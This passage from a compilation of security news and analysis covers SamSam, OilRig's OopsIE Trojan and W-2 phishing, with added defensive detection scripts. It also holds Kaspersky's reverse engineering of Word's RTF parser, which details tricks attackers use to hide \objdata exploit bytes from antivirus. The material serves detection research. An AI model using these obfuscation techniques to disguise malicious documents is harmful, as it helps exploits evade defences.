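2018-02-21T02:00:15 4625 10 cdot-svc 203.0.113.7
2018-02-21T02:01:00 4625 2 jsmith 10.0.0.5
2018-02-21T02:01:05 4625 10 jsmith 10.0.0.5
2018-02-21T02:01:07 4624 10 jsmith 10.0.0.5
2018-02-21T02:03:44 4624 10 cdot-svc 203.0.113.7
"""

FAIL_THRESHOLD = 5             # failed RDP logons from one source ...
WINDOW = timedelta(minutes=5)  # ... within this sliding window


def parse_events(text: str) -> List[dict]:
    """Parse the simplified export into dicts, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, account, src = line.split()
        events.append({
            "ts": datetime.fromisoformat(ts),
            "id": int(event_id),
            "logon_type": int(logon_type),
            "account": account,
            "src": src,
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_rdp_bruteforce(events: List[dict], threshold: int = FAIL_THRESHOLD,
                          window: timedelta = WINDOW) -> Dict[str, dict]:
    """Flag sources with >= threshold failed RDP logons inside the window.
    A later successful RDP logon from a flagged source upgrades the finding to
    'success_after_bruteforce' and records which account let them in."""
    recent_failures = defaultdict(list)   # src -> failure timestamps in window
    accounts_tried = defaultdict(set)     # src -> every account name attempted
    findings: Dict[str, dict] = {}
    for e in events:
        if e["logon_type"] != 10:         # only RemoteInteractive (RDP) logons
            continue
        src = e["src"]
        if e["id"] == 4625:
            q = recent_failures[src]
            q.append(e["ts"])
            while q and e["ts"] - q[0] > window:
                q.pop(0)                  # expire failures older than the window
            accounts_tried[src].add(e["account"])
            if len(q) >= threshold:
                f = findings.setdefault(src, {
                    "verdict": "bruteforce", "max_failures": 0,
                    "accounts": set(), "compromised": None,
                })
                f["max_failures"] = max(f["max_failures"], len(q))
                f["accounts"] = set(accounts_tried[src])
        elif e["id"] == 4624 and src in findings:
            findings[src]["verdict"] = "success_after_bruteforce"
            findings[src]["compromised"] = e["account"]
    return findings
```

The single failed logon from 10.0.0.5 followed by a success is an ordinary typo and is not reported; the external source that cycles through several account names and then logs in as one of them is exactly the sequence that precedes a SamSam deployment, and the compromised account name is what the responder needs first.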

Among the victims of SamSam is MedStar, the non-profit group that manages 10 hospitals in the Baltimore and Washington area. The crooks behind the attack on MedStar demanded 45 bitcoins (about US$18,500 at the time) to restore the encrypted files, but the organization refused to pay because it had backups of the encrypted data.

In April 2016, the FBI issued a confidential urgent “Flash” alert to businesses and organizations about the SamSam ransomware.

Back to the present: SamSam made the headlines in the first days of 2018, when it infected systems at several high-profile targets, including hospitals, an ICS firm and a city council.

SamSam ransomware

Iran-linked group OilRig used a new Trojan called OopsIE in recent attacks
24.2.2018 securityaffairs BigBrothers  APT

According to malware researchers at Palo Alto Networks, the Iran-linked OilRig APT group is now using a new Trojan called OopsIE.
The Iran-linked OilRig APT group is now using a new Trojan called OopsIE; experts at Palo Alto Networks observed the malware in recent attacks against an insurance agency and a financial institution in the Middle East.

One of the attacks relied on a variant of the ThreeDollars delivery document, the same malicious document the threat actor had sent to the UAE government to deliver the ISMInjector Trojan.

In the second attack detected by Palo Alto Networks, the OilRig hackers attempted to deliver the malicious code via a link in a spear-phishing message.

“On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. Just over a week later, on January 16, 2018, we observed an attack on a Middle Eastern financial institution. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE.” reads the analysis from Palo Alto Networks.

In the first attack, on January 8, 2018, the hackers sent two emails to two different addresses at the target organization within a six-minute span. The attackers spoofed an email address on the Lebanese domain of a major global financial institution.

OilRig launched the second attack on January 16; in this case the OopsIE Trojan was downloaded directly from the command and control (C&C) server. This was the second time OilRig had targeted this organization; the first attack occurred in 2017.

The researchers explained that the malware is packed with SmartAssembly and obfuscated with ConfuserEx.

The malware gains persistence by creating a VBScript file and a scheduled task that runs it every three minutes. The OopsIE Trojan communicates with the C&C over HTTP using the InternetExplorer application object.

“By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. The OopsIE Trojan is configured to use a C2 server hosted at: www.msoffice365cdn[.]com” states the analysis.

“The Trojan will construct specific URLs to communicate with the C2 server and parses the C2 server’s response looking for content within the tags <pre> and </pre>. The initial HTTP request acts as a beacon”


The Trojan can run a command, upload a file, or download a specified file.
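The persistence mechanism described above (a scheduled task re-running a VBScript file every three minutes) is a pattern that can be hunted for across a fleet without any malware-specific indicator. The following is an added example written for this page, not Palo Alto Networks' code or anything recovered from OopsIE. It reads Task Scheduler XML of the kind `schtasks /query /xml` exports and scores tasks on two properties: a short repetition interval and an action that runs VBScript. The three tasks are constructed for the demo; their names, paths and intervals are invented, and only the XML element names follow the real Task Scheduler schema.

```python
"""Hunt exported Task Scheduler XML for short-interval VBScript tasks.
Added example for this page; sample tasks are constructed."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, Optional

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
_TASK_OPEN = ('<Task version="1.2" '
              'xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">')

# Constructed samples: task path -> exported XML (benign, noisy, malicious-looking)
SAMPLE_TASKS: Dict[str, str] = {
    "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": _TASK_OPEN + """
  <Triggers><CalendarTrigger><Repetition><Interval>P1W</Interval></Repetition>
    <StartBoundary>2018-01-01T01:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command>
    <Arguments>-c -h -o</Arguments></Exec></Actions>
</Task>""",
    "\\Monitoring\\AgentHeartbeat": _TASK_OPEN + """
  <Triggers><TimeTrigger><Repetition><Interval>PT5M</Interval></Repetition>
    <StartBoundary>2018-01-01T00:00:00</StartBoundary></TimeTrigger></Triggers>
  <Actions><Exec><Command>C:\\Program Files\\Agent\\agent.exe</Command>
    <Arguments>--beat</Arguments></Exec></Actions>
</Task>""",
    "\\WindowsUpdateCheck": _TASK_OPEN + """
  <Triggers><TimeTrigger><Repetition><Interval>PT3M</Interval></Repetition>
    <StartBoundary>2018-01-08T09:30:00</StartBoundary></TimeTrigger></Triggers>
  <Actions><Exec><Command>wscript.exe</Command>
    <Arguments>//B "C:\\Users\\Public\\update.vbs"</Arguments></Exec></Actions>
</Task>""",
}

SHORT_INTERVAL_SECONDS = 5 * 60
_DURATION = re.compile(r"P(?:(\d+)W)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")
_SCRIPT_HOST = re.compile(r"^[wc]script(\.exe)?$", re.IGNORECASE)


def iso_duration_seconds(value: str) -> Optional[int]:
    """Parse the ISO 8601 durations Task Scheduler uses (PT3M, P1D, PT1H30M)."""
    m = _DURATION.match(value.strip())
    if not m:
        return None
    w, d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return w * 604800 + d * 86400 + h * 3600 + mi * 60 + s


def hunt_tasks(tasks: Dict[str, str],
               short_interval: int = SHORT_INTERVAL_SECONDS) -> Dict[str, dict]:
    """Return suspicious tasks with reasons. 'high' = short repetition interval
    AND a VBScript action (the pattern described); 'low' = only one of the two."""
    findings: Dict[str, dict] = {}
    for name, xml_text in tasks.items():
        root = ET.fromstring(xml_text)
        reasons = []
        intervals = [iso_duration_seconds(i.text or "")
                     for i in root.findall(".//t:Repetition/t:Interval", NS)]
        short = [i for i in intervals if i is not None and i <= short_interval]
        has_short = bool(short)
        if has_short:
            reasons.append(f"repeats every {min(short)}s")
        has_script = False
        for ex in root.findall(".//t:Actions/t:Exec", NS):
            command = (ex.findtext("t:Command", "", NS) or "").strip().strip('"')
            args = ex.findtext("t:Arguments", "", NS) or ""
            binary = command.replace("/", "\\").split("\\")[-1]
            if _SCRIPT_HOST.match(binary) or ".vbs" in args.lower():
                has_script = True
                reasons.append(f"runs VBScript via {binary or 'unknown host'}")
        if reasons:
            severity = "high" if has_short and has_script else "low"
            findings[name] = {"severity": severity, "reasons": reasons}
    return findings
```

Run across exported task definitions from many hosts, the `high` bucket is small enough to triage by hand; the `low` bucket (short-interval tasks running ordinary binaries, or VBScript run hourly) is where an analyst adds allow-listing for known agents rather than raising the threshold.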

OilRig will continue to adapt its tactics; the experts believe it will remain a highly active threat actor in the Middle East.

“This group has repeatedly shown evidence of a willingness to adapt and evolve their tactics, while also reusing certain aspects as well. We have now observed this adversary deploy a multitude of tools, with each appearing to be some form of iterative variation of something used in the past. However, although the tools themselves have morphed over time, the plays they have executed in their playbook largely remain the same when examined over the attack life cycle,” Palo Alto concludes.

FBI warns of spike in phishing campaigns to gather W-2 information
24.2.2018 securityaffairs BigBrothers

The FBI is warning of a spike in phishing campaigns aimed to steal W-2 information from payroll personnel during the IRS’s tax filing season.
The FBI has observed a significant increase since January in complaints of compromised or spoofed emails involving W-2 information.

“Beginning in January 2017, IRS’s Online Fraud Detection & Prevention (OFDP), which monitors for suspected IRS-related phishing emails, observed an increase in reports of compromised or spoofed emails requesting W-2 information.” states the alert published by the FBI.

W-2 information is a precious commodity for crooks, who are showing increasing interest in tax data.

Law enforcement and security experts have observed many variations of IRS- and tax-related phishing campaigns, but the most effective aim at mass data theft, for example campaigns targeting Human Resources (HR) professionals.

“The most popular method remains impersonating an executive, either through a compromised or spoofed email in order to obtain W-2 information from a Human Resource (HR) professional within the same organization.” continues the alert.

“Individual taxpayers may also be the targeted, but criminals have evolved their tactics to focus on mass data thefts.”

w-2 information

A separate warning about W-2-related phishing campaigns was issued by the Internal Revenue Service.

“The Form W-2 scam has emerged as one of the most dangerous phishing emails in the tax community. During the last two tax seasons, cybercriminals tricked payroll personnel or people with access to payroll information into disclosing sensitive information for entire workforces.” reads the IRS’s advisory issued in January. “The scam affected all types of employers, from small and large businesses to public schools and universities, hospitals, tribal governments and charities.”

Once the cybercriminals have obtained the W-2 information, they often follow up with a wire transfer request; unfortunately, in the case of businesses and organizations, the scam is often not discovered for weeks or months.

“The initial email may be a friendly, “hi, are you working today” exchange before the fraudster asks for all Form W-2 information. In several reported cases, after the fraudsters acquired the workforce information, they immediately followed that up with a request for a wire transfer.” continues the advisory.

“In addition to educating payroll or finance personnel, the IRS and Security Summit partners also urge employers to consider creating a policy to limit the number of employees who have authority to handle Form W-2 requests and that they require additional verification procedures to validate the actual request before emailing sensitive data such as employee Form W-2s.”

Phishing scams related to W-2 information have been increasing: the number of reports of this scheme from both victims and non-victims jumped from just over 100 in 2016 to roughly 900 in 2017, and the IRS confirmed that more than 200 employers were victimized in 2017.

“Reports to phishing@irs.gov from victims and nonvictims about this scam jumped to approximately 900 in 2017, compared to slightly over 100 in 2016. Last year, more than 200 employers were victimized, which translated into hundreds of thousands of employees who had their identities compromised.” continues the alert.

Let me close with the recommendations published by the FBI to avoid falling victim to W-2 phishing scams and BEC:

Limit the number of employees within a business who have the authority to approve and/or conduct wire transfers and handle W-2 related requests or tasks
Use out of band authentication to verify requests for W-2 related information or wire transfer requests that are seemingly coming from executives. This may include calling the executive to obtain verbal verification, establishing a phone Personal Identification Number (PIN) to verify the executive’s identity, or sending the executive via text message a one-time code and a phone number to call in order to confirm the wire transfer request
Verify a change in payment instructions to a vendor or supplier by calling to verbally confirm the request. The phone number should not come from the electronic communication, but should instead be taken from a known contact list for that vendor
Maintain a file, preferably in non-electronic form, of vendor contact information for those who are authorized to approve changes in payment instructions
Delay the transaction until additional verifications can be performed such as having staff wait to be contacted by the bank to verify the wire transfer
Require dual-approval for any wire transfer request involving one or more of the following:
A dollar amount over a specific threshold
Trading partners who have not been previously added to a “white list” of approved trading partners to receive wire payments
New trading partners
New bank and/or account numbers for current trading partners
Wire transfers to countries outside of the normal trading pattern

Disappearing bytes: Reverse engineering the MS Office RTF parser
24.2.2018 Kaspersky
Microsoft Office was a prime target for attacks in 2017. As well as the large number of vulnerabilities discovered and proof-of-concept exploits published, malware authors felt it necessary to prevent detection of ‘one-day’ and ‘old-day’ exploits by antivirus software. It also became clear that using RTF parsing features and peculiarities was no longer enough to effectively evade detection. Along with the rise of MS Office exploitation, with RTF used as a container for the exploit, we encountered lots of samples that were ‘exploiting’ the implementation of Microsoft Word’s RTF parser to confuse all other third-party RTF parsers, including those used in AV software.

To achieve parsing exactly like that in MS Office, we needed to reverse-engineer it.

I decided to look first at MS Office 2010, because when it comes to parsing it’s better to look at an older implementation. I then compared my findings with those found in newer versions.

The RTF parser in MS Office 2010 is a state machine with 37 states, 22 of which are unique.

We’ll look at the most significant states and those that have an influence on the parsing of \objdata, a destination control word that contains the object data. Microsoft OLE links, Microsoft OLE embedded objects, and Macintosh Edition Manager subscriber objects are represented in RTF as objects. The states discussed below are:

PARSER_BEGIN
PARSER_CHECK_CONTROL_WORD
PARSER_PARSE_CONTROL_WORD
PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER
PARSER_PROCESS_CMD
PARSER_PARSE_HEX_DATA
PARSER_PARSE_HEX_NUM_MSB
PARSER_PARSE_HEX_NUM_LSB
PARSER_SKIP_DATA
// …

Microsoft Office is shipped without debug symbols, meaning it wasn’t possible to recover the original state names. However, I believe I’ve chosen suitable names according to their underlying functionality.

The first state executed on an opened RTF file is PARSER_BEGIN. In most cases it is also executed after a control word has been processed. The main goal of this state is to determine the next state according to the encountered character, the current destination, and other values stored in the ‘this’ structure and set by the control word handlers. By default the next state is PARSER_CHECK_CONTROL_WORD.


// PARSER_BEGIN
// … - checks that we don't need
while (data.pos != data.end)
{
    byte = *(uint8_t*)data.pos;
    if (this->bin_size > 0)
    {
        // pending \binN payload: never interpreted as RTF text
        goto unexpected_char;
    }
    // …
    if (byte == 9)
    {
        // …
    }
    else if (byte == 0xA || byte == 0xD)
    {
        // …
    }
    else if (byte == '\\')
    {
        uint8_t byte1 = *(uint8_t*)data.pos;   // the character after the backslash (pointer advance elided)
        if (byte1 == '\'')
        {
            if (this->destination == listname ||
                this->destination == fonttbl ||
                this->destination == revtbl ||
                this->destination == falt ||
                this->destination == leveltext ||
                this->destination == levelnumbers ||
                this->destination == liststylename ||
                this->destination == protusertbl ||
                this->destination == lsdlockedexcept)
            {
                goto unexpected_char;
            }
            // …
        }
        else if (byte1 == 'u')
        {
            // …
        }
        // … (default: next state is PARSER_CHECK_CONTROL_WORD)
    }
    else if (byte == '{')
    {
        // …
    }
    else if (byte == '}')
    {
        // …
    }
    else
    {
    unexpected_char:
        // it will set next state depending on destination / or go to unexpected_cmd to do more checks and magic
        // …
        if (this->destination == pict ||
            this->destination == objdata ||
            this->destination == objalias ||
            this->destination == objsect ||
            this->destination == datafield ||
            this->destination == fontemb ||
            this->destination == svb ||
            this->destination == macro ||
            this->destination == tci ||
            this->destination == datastore ||
            this->destination == mmconnectstrdata ||
            this->destination == mmodsoudldata ||
            this->destination == macrosig)
        {
            // … (next state: PARSER_PARSE_HEX_DATA)
        }
        // …
    }
}

PARSER_CHECK_CONTROL_WORD will check if the next char is the start of a control word or if it’s a control symbol, and will set the next state accordingly.


// PARSER_CHECK_CONTROL_WORD
byte = *(uint8_t*)data.pos;
if ((byte >= 'a' && byte <= 'z') || (byte == ' ') || (byte >= 'A' && byte <= 'Z'))
{
    // start of a control word: reset the temporary buffer and store the first character
    this->cmd_len = 0;
    // …
    this->temp[0] = 1;
    this->temp[1] = byte;
    this->temp[2] = 0;
    this->cmd_len = 1;
    // … (next state: PARSER_PARSE_CONTROL_WORD)
}
else
{
    // control symbol
    // …
}

The states PARSER_PARSE_CONTROL_WORD and PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER store the null-terminated control word (made up of ASCII alphabetical characters) and, if present, the null-terminated numeric parameter in a temporary buffer of fixed size; control word, parameter and their terminators have to fit in 0xFF bytes.


// PARSER_PARSE_CONTROL_WORD
pos = this->temp + 1;        // start of the control word in the temporary buffer
parsed = this->temp + 1;     // write cursor
while (data.pos != data.end)
{
    byte = *(uint8_t*)data.pos;
    // length of null-terminated strings cmd + num should be <= 0xFF
    if ((byte == '-') || (byte >= '0' && byte <= '9'))
    {
        // end of the control word, start of the numeric parameter
        //if parsed == temp_end
        //  goto raise_exception
        *parsed = 0;
        // … (++parsed)
        pos = parsed;
        if (parsed >= temp_end)
        {
            parsed = temp_end - 1;
            *parsed = 0;
            this->cmd_len = pos - (this->temp + 1);
            // … (buffer full: next state is PARSER_PROCESS_CMD)
        }
        this->cmd_len = pos - (this->temp + 1);
        *parsed = byte;
        // … (++parsed)
        pos = parsed;
        // … (next state: PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER)
    }
    if (byte == ' ')
    {
        // a space terminates the control word and is consumed
        if (parsed >= temp_end)
        {
            parsed = temp_end - 1;
        }
        *parsed = 0;
        this->cmd_len = pos - (this->temp + 1);
        // … (next state: PARSER_PROCESS_CMD)
    }
    if ((byte >= 'a' && byte <= 'z') || (byte >= 'A' && byte <= 'Z'))
    {
        if (parsed - this->temp >= 0xFF)
        {
            // the control word does not fit: truncate it and process what we have
            if (parsed >= temp_end)
            {
                parsed = temp_end - 1;
            }
            *parsed = 0;
            this->cmd_len = pos - (this->temp + 1);
            // …
        }
        //if parsed == temp_end
        //  goto raise_exception
        *parsed = byte;
        // … (++parsed)
        pos = parsed;
    }
    // … (any other character terminates the control word and is left in the stream)
    if (parsed >= temp_end)
    {
        parsed = temp_end - 1;
    }
    *parsed = 0;
    this->cmd_len = pos - (this->temp + 1);
    // … (next state: PARSER_PROCESS_CMD)
}

// PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER
while (data.pos != data.end)
{
    byte = *(uint8_t*)data.pos;
    // length of null-terminated strings cmd + num should be <= 0xFF
    if (byte == ' ')
    {
        // a space terminates the parameter and is consumed
        if (parsed >= temp_end)
        {
            parsed = temp_end - 1;
        }
        *parsed = 0;
        // … (next state: PARSER_PROCESS_CMD)
    }
    if (byte >= '0' && byte <= '9')
    {
        if (parsed - this->temp >= 0xFF)
        {
            // buffer full: the parameter ends here, the remaining digits stay in the stream
            if (parsed >= temp_end)
            {
                parsed = temp_end - 1;
            }
            *parsed = 0;
            // … (next state: PARSER_PROCESS_CMD)
        }
        //if parsed == temp_end
        //  goto raise_exception
        *parsed = byte;
        // … (++parsed)
    }
    // … (any other character terminates the parameter and is left in the stream)
    if (parsed >= temp_end)
    {
        parsed = temp_end - 1;
    }
    *parsed = 0;
    // … (next state: PARSER_PROCESS_CMD)
}

// main loop: a handler stores the next state, the dispatcher reads it back
// …
this->state = state;
// …
state = this->state;

The control word is then processed in the state PARSER_PROCESS_CMD, which calls another function responsible for processing control words and control symbols. That function takes the current state into account and sets the next state.

There are multiple states responsible for parsing hex data. The most interesting for us is PARSER_PARSE_HEX_DATA; as the PARSER_BEGIN code above shows, it is selected when the destination is objdata.


// PARSER_PARSE_HEX_DATA
parsed_data = this->temp;
if (this->bin_size <= 0)
{
    // hexadecimal data
    while (data.pos != data.end)
    {
        byte = *(uint8_t*)data.pos;
        if (byte == '{' || byte == '}' || byte == '\\')
        {
            // end of the hex run: flush what was decoded and return to PARSER_BEGIN
            // (the MSB bit in this->flag is left as it is)
            if (parsed_data != this->temp)
            {
                push_data(parsed_data - this->temp);
                parsed_data = this->temp;
            }
            // …
        }
        if (this->flag & 0x4000)
        {
            // out of memory earlier: characters are consumed but no longer stored
            // …
        }
        if (byte >= '0' && byte <= '9')
        {
            val = byte - 0x30;
        }
        else if (byte >= 'a' && byte <= 'f')
        {
            val = byte - 0x57;
        }
        else if (byte >= 'A' && byte <= 'F')
        {
            val = byte - 0x37;
        }
        else if (byte == 9 || byte == 0xA || byte == 0xD || byte == 0x20)
        {
            // whitespace inside hex data is skipped
            // …
        }
        // …
        // (when the output buffer cannot be grown: show message that there is not enough memory;
        //  this->flag |= 0x4000;)
        if (this->flag & 0x8000)
        {
            // high nibble
            this->hex_data_byte = val << 4;
            this->flag &= 0x7FFF;
        }
        else
        {
            // low nibble: the byte is complete
            if (parsed_data == temp_end)
            {
                // … (flush the temporary buffer)
                parsed_data = this->temp;
            }
            this->hex_data_byte |= val;
            *parsed_data = this->hex_data_byte;
            // … (++parsed_data)
            this->flag |= 0x8000;
        }
        // …
    }
}
else if (this->flag & 0x4000)
{
    // binary data (\binN) but no memory: just skip bin_size bytes
    uint32_t size;
    if (this->bin_size <= data.end - data.pos)
    {
        size = this->bin_size;
    }
    else
    {
        size = data.end - data.pos;
    }
    this->bin_size -= size;
    data.pos += size;
}
else
{
    // binary data (\binN): copy bin_size raw bytes, no hex decoding
    while (this->bin_size > 0)
    {
        if (parsed_data == temp_end)
        {
            // … (flush the temporary buffer)
            parsed_data = this->temp;
        }
        byte = *(uint8_t*)data.pos;
        *parsed_data = byte;
        // … (++parsed_data; ++data.pos; --this->bin_size)
    }
}
if (parsed_data != this->temp)
{
    push_data(parsed_data - this->temp);
    parsed_data = this->temp;
}

This state parses hexadecimal data, or raw binary data when bin_size has been set by the \bin control word.

The states PARSER_PARSE_HEX_NUM_MSB and PARSER_PARSE_HEX_NUM_LSB are used together to parse hex values (data of the \panose control word and \’ control symbol).


// PARSER_PARSE_HEX_NUM_MSB
this->flag |= 0x8000;        // next nibble is the high one (same bit as in PARSER_PARSE_HEX_DATA)
this->hex_num_byte = 0;
// … (next state: PARSER_PARSE_HEX_NUM_LSB)

// PARSER_PARSE_HEX_NUM_LSB
// …
byte = *(uint8_t*)data.pos;
val = 0;                     // a non-hex character simply contributes 0
if (byte - '0' <= 9)         // unsigned comparisons, as in the decompiled code
{
    val = byte - 0x30;
}
else if (byte - 'a' <= 5)
{
    val = byte - 0x57;
}
else if (byte - 'A' <= 5)
{
    val = byte - 0x37;
}
this->hex_num_byte |= val << ((this->flag >> 0xF) << 2);            // shift by 4 for the high nibble, by 0 for the low one
this->flag = ((~this->flag ^ this->flag) & 0x7FFF) ^ ~this->flag;   // toggles bit 15, i.e. this->flag ^= 0x8000
if (this->flag & 0x8000)
{
    // both nibbles consumed: hex_num_byte is complete
    // …
}

State reset
Looking at PARSER_PARSE_HEX_NUM_MSB, PARSER_PARSE_HEX_NUM_LSB and PARSER_PARSE_HEX_DATA, it is easy to spot a bug. Although they use different variables to store the decoded value (hex_num_byte and hex_data_byte), they use the same flag bit (0x8000) to determine which nibble is being decoded: the high one (most significant bits, or MSB) or the low one (least significant bits, or LSB). And PARSER_PARSE_HEX_NUM_MSB always resets this bit to MSB.

It is therefore possible to make bytes disappear in the PARSER_PARSE_HEX_DATA context by triggering a change of state to PARSER_PARSE_HEX_NUM_MSB.

For this to work it is enough to put \'XX in the data that follows the \objdata control word. When the parser encounters \ in state PARSER_PARSE_HEX_DATA it returns to PARSER_BEGIN and from there goes to PARSER_PROCESS_CMD. The handler for the \' control symbol does not change the destination, but sets the next state to PARSER_PARSE_HEX_NUM_MSB. After PARSER_PARSE_HEX_NUM_MSB and PARSER_PARSE_HEX_NUM_LSB, control is transferred back to PARSER_BEGIN and eventually to PARSER_PARSE_HEX_DATA, because the destination is still objdata. After all that, the next byte is decoded as a high nibble, and any high nibble that was pending before the \' is lost.

It is also worth noting that PARSER_PARSE_HEX_NUM_LSB does not check if the provided value is a valid hexadecimal; therefore, after \’ there could be absolutely any two bytes.

This behavior can be observed in the following example: in an \objdata stream, the sequence f\'cc is removed from the final result (the f is held as a pending high nibble, \'cc resets the MSB bit, and the next character starts a new byte).

When control is transferred for the first time to the PARSER_PARSE_HEX_DATA state, after the \objdata control word is processed, the MSB bit is already set. Let’s look at how it happens and how this example will be processed:

After some reverse engineering of the keyword processing function, I found a list of all the control words and their corresponding structures.

With this information we can locate and look at the objdata constructor.

You can see it sets the MSB bit, allocates a new buffer and replaces the old pointer with a new one. Therefore, the data decoded between two \objdata control words is never used.

In the example, the d0cf11e0a1b11ae1 that precedes the second \objdata is removed from the final result.

Final destination
We know that if \’ or \objdata is put in data, it will change the output. What about other control words and control symbols? There are more than 1500 of them!

Mostly nothing.

As some control words represent a destination, they can’t be used – they change the objdata destination on their own, and to decode an object the objdata destination is needed.

Other control words do not affect objdata destination.

The only way to change the destination and later return to the objdata destination without losing the previously decoded data is to use the special symbols opening brace ({) and closing brace (}), which mark the start and end of a group.

When the parser encounters the end of a group in state PARSER_BEGIN, the destination that was set before the start of the group will be restored.

Therefore, by putting {\aftncn FF} after \objdata, FF will not get into the decoded data because FF now applies to the destination aftncn and will be handled according to this destination.

However, by using {\aftnnalc FF}, FF will get into the decoded data because the destination is still equal to objdata.

It is also worth noting that {\objdata FF} still can’t be used because the buffer will not be restored.

An accurate list of all destination control words was created with a simple fuzzer.

Fixed-size buffer
Another obfuscation technique that comes to mind while looking at the code of the RTF parser is not related to this ‘MSB’ bug, but can also be used to remove bytes from a hex stream. It relies on the size of the temporary buffer and on how a control word and its numeric parameter are parsed in the states PARSER_PARSE_CONTROL_WORD and PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER, as in the example below.

In this example the size of the data that will be removed as part of the numeric parameter is calculated using the formula: 0xFF (size of temporary buffer) – 0xB (size of ‘oldlinewrap’) – 2 (null-terminator characters) = 0xF2.

Unnecessary data
While the techniques described above are related to general RTF parsing, the processing of some specific keywords conceals some further confusion.

According to the specification, if \* is encountered right before a control word or control symbol that is not found in the lookup table, it is considered an unknown destination group and all data up to the closing brace } of that group should be discarded. The lookup table in MS Office contains control words that are not present in the specification, which raises the concern that it may change in future versions, affecting the parsing of the same document across versions of MS Office. When the function responsible for processing keywords encounters such a case, or one of several specific control words (such as \comment, \generator, \nonshppict and so on), it sets the state PARSER_SKIP_DATA and the count of encountered opening braces { to 1.
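The behaviour described under ‘State reset’, ‘Final destination’ and ‘Fixed-size buffer’, together with the \* rule above, can be checked against a small model of Word’s objdata handling. The following Python emulator is an added example written for this page; it is not Kaspersky’s code, not a decompilation of Word, and not a general RTF parser. Its function decode_objdata, the constant TEMP_BUF_SIZE and the two control-word sets DESTINATION_WORDS and KNOWN_WORDS are its own names; the two sets are small illustrative subsets of Word’s lookup table, and \bin, \uN and other control symbols are deliberately not modelled (assumptions).

```python
# Added example (not Kaspersky's or Microsoft's code): a toy model of how MS Word's RTF
# parser fills the \objdata buffer, reproducing the quirks described in the text.
# Assumptions: the control-word tables below are small illustrative subsets; \bin, \uN
# and other control symbols are ignored; non-hex junk inside objdata is dropped.

TEMP_BUF_SIZE = 0xFF   # control word + numeric parameter + two NULs must fit in here

DESTINATION_WORDS = {"objdata", "objalias", "objsect", "datafield", "pict", "fonttbl",
                     "aftncn", "comment", "generator"}              # subset (assumption)
KNOWN_WORDS = DESTINATION_WORDS | {"rtf", "ansi", "aftnnalc", "oldlinewrap", "bin"}


def _is_alpha(b):
    return 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A


def _hex_value(b):
    """Nibble value of an ASCII hex digit, as PARSER_PARSE_HEX_DATA computes it, or None."""
    if 0x30 <= b <= 0x39:
        return b - 0x30
    if 0x61 <= b <= 0x66:
        return b - 0x57
    if 0x41 <= b <= 0x46:
        return b - 0x37
    return None


def decode_objdata(rtf: bytes) -> bytes:
    """Return the contents of the current \\objdata buffer as Word would decode them."""
    out = bytearray()       # current objdata buffer; replaced by every \objdata
    expect_high = True      # the "MSB" bit (flag 0x8000) shared with the \'XX decoder
    pending = 0             # high nibble waiting for its low nibble
    dest, stack = None, []  # current destination; destinations saved at '{'
    ignorable = False       # True right after a \* control symbol
    i, n = 0, len(rtf)
    while i < n:
        b = rtf[i]
        was_ignorable, ignorable = ignorable, False
        if b == 0x7B:                                   # '{' : save destination
            stack.append(dest)
            i += 1
        elif b == 0x7D:                                 # '}' : restore destination
            dest = stack.pop() if stack else None
            i += 1
        elif b == 0x5C and i + 1 < n:                   # backslash
            c = rtf[i + 1]
            if c == 0x27:                               # \'XX: MSB bit reset, any two bytes eaten
                expect_high = True
                i += 4
            elif c == 0x2A:                             # \* : next unknown word is ignorable
                ignorable = True
                i += 2
            elif _is_alpha(c):                          # control word
                j = i + 1
                while j < n and _is_alpha(rtf[j]):
                    j += 1
                word = rtf[i + 1:j].decode("ascii")
                # Numeric parameter: only what fits in the temporary buffer is consumed;
                # any further digits stay in the stream and are decoded as hex data.
                room, k = TEMP_BUF_SIZE - len(word) - 2, j
                while k < n and room > 0 and ((rtf[k] == 0x2D and k == j) or 0x30 <= rtf[k] <= 0x39):
                    k, room = k + 1, room - 1
                if k < n and rtf[k] == 0x20:            # one delimiting space is eaten
                    k += 1
                if was_ignorable and word not in KNOWN_WORDS:
                    depth = 1                           # drop the whole group
                    while k < n and depth:
                        if rtf[k] == 0x5C:              # skip escaped \{ and \}
                            k += 2
                            continue
                        depth += (rtf[k] == 0x7B) - (rtf[k] == 0x7D)
                        k += 1
                    if stack:
                        dest = stack.pop()
                elif word == "objdata":                 # constructor: new buffer, MSB bit set
                    out, expect_high, dest = bytearray(), True, "objdata"
                elif word in DESTINATION_WORDS:
                    dest = word
                i = k
            else:                                       # other control symbol: no effect
                i += 2
        else:
            if dest == "objdata":
                v = _hex_value(b)
                if v is not None:
                    if expect_high:
                        pending, expect_high = v << 4, False
                    else:
                        out.append(pending | v)
                        expect_high = True
            i += 1
    return bytes(out)
```

Feeding it the cases from the text reproduces them: the clean object, the variant with f\'cc inserted, the variant with {\aftncn FF} and the variant with \oldlinewrap followed by 0xF2 digits all yield the same bytes, while {\aftnnalc FF} injects an 0xFF byte, a second \objdata or a nested {\objdata FF} throws away what was decoded before it, and a 0xF3-digit parameter leaks its last digit into the hex stream. A parser that follows the RTF specification instead of Word’s state machine disagrees on every one of these inputs, which is precisely what the obfuscated samples rely on; a pipeline that extracts OLE objects from RTF for scanning should therefore emulate Word’s quirks rather than the specification.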



Kind of magic
During analysis of the PARSER_SKIP_DATA* states I found things that contradict not only the specification but also the rest of the parser code.

These states skip data while looking for the \bin control word, updating the count of encountered opening and closing braces until it reaches zero. The hidden catch lies in the way the numeric parameter is processed.

